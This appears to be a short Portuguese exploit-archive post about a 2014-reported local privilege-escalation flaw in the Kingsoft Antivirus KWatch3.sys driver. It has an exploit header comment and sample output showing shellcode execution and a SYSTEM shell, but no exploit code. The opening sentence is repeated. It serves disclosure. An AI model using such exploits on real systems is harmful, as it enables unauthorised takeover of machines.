
Um exploit antigo de uma vulnerabilidade local de EoP no Kingsoft Antivirus KWatch Driver versão 2009.3.17.77.
Um exploit antigo de uma vulnerabilidade de EoP local no driver KWatch do Kingsoft Antivirus versão 2009.3.17.77.
Relatei o problema em janeiro de 2014 e fui notificado do CVE mais de 8 anos depois. Decidi enviar isto porque é bastante divertido encontrar meu código antigo e ver que levou tanto tempo.
Assim, esta não deve ser uma vulnerabilidade nova apesar do novo CVE — uma busca rápida já mostrou vários relatos da mesma vulnerabilidade aparente.
Ainda agradeço à IPA por fazer sua parte e alegrar meu dia.
O arquivo vulnerável parece ser ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/